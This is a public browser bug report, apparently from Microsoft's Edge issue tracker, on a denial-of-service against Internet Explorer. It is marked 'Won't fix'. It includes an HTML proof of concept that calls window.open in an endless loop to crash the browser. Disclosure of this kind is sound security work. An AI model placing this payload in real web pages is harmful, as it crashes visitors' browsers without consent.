DoS.my.Tab | DoS Attack on IE user with a "new tab" JS

Won’t fix Issue #106723

Details

Created
Apr 27, 2014
Privacy
This issue is public.
Found in build #
0.0011
Reports
Reported by 0 people

Sign in to watch or report this issue.

Steps to reproduce

URL = http://srvr-clw/bugs/67036

URL:

Repro Steps:

==============

  1. GOTO URL above (be aware script will crash your IE)

  2. KILL IE sessions thru taskmgr

Run the following code as HTML page (from external server or in case of a local server, allow JS to run locally)

PoC:

<html>

<head>

<title> :: DoS.my.Tab :: </title>

</head>

<body>

<H1>DoS.my.Tab</H1>

<script>

while ( true )

window.open( “http://target.host/” );

</script>

</body>

</html>

Expected Results:

==============

IE JS engine should limit the number of tabs/windows opened by the same page (unless triggered by the user with right click -> open in new tab/window)

Actual Results:

==============

Attachments

0 attachments

    Comments and activity

    • Microsoft Edge Team

      Changed Assigned To to “IPBS P.”

      Changed Assigned To from “IPBS P.” to “Bruce M.”

      Changed Assigned To to “Kamen M.”

      Changed Assigned To to “Christian F.”

      Changed Steps to Reproduce

      Changed Assigned To to “Tony S.”

      Changed Assigned To from “Tony S.” to “Bruce M.”

      Changed Assigned To from “Bruce M.” to “Forbes H.”

      Changed Status to “Confirmed”

      Changed Assigned To to “Mara P.”

      Changed Assigned To from “Mara P.” to “IPBS P.”

      Changed Status from “Confirmed” to “Won’t fix”

      Changed Assigned To from “IPBS P.” to “Mara P.”

    You need to sign in to your Microsoft account to add a comment.

    Sign in